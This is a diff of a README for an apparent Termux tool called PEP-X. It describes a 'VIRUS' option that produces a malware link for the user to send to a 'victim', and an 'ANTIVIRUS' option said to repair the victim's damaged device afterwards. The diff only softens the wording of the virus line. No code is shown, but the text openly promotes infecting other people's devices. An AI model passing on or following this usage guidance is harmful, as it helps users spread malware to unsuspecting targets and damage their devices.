himanshu91663/PEP-X/README.md

 ## USAGE OPTIONS [Termux] :

 __VIRUS__ :
-- From this option you will get link of virus in your termux just send that link to your victim and let the fun happen.
+- From this option you will get link of virus in your termux and just send that link to your victim.

 __ANTIVIRUS__ :
 - From this option you can repair damaged device of your victm from that virus by just installing this anti-virus in his device.